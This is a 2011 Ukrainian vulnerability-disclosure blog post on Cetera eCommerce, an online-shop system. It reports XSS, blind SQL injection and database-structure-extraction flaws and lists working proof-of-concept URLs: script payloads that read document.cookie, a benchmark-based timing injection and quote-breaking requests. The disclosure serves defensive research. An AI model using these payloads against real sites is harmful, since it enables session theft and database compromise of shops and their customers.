Нові уразливості в Cetera eCommerce

19:21 26.03.2011

28.01.2011

У грудні, 14.12.2010, я знайшов нові Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru (на перші дві XSS звернув мою увагу Maciej Gojny). Причому деякі уразливості стосуються як 14 версії, так і 15 версії Cetera eCommerce, що вийшла у жовтні 2010 року (і яка зараз розміщена на демо сайті).

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

26.03.2011

XSS (також працюють в версії 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS:

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

Дана уразливість з’явилася в версії 15.0. Уразливість має місце на сторінці з 404 помилкою, тому вона спрацює як за цією адресою, так і за іншими адресами, що ведуть на неіснуючі сторінки.

SQL Injection (blind SQLi):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/

SQL DB Structure Extraction:

http://site/catalog/%22/

http://site/catalog/cart/’/

Уразливі Cetera eCommerce 14.0 та попередні версії, а XSS уразливості також стосуються версії 15.0. Останні чотири уразливості вже виправлені в останній версії системи.


Leave a Reply

You must be logged in to post a comment.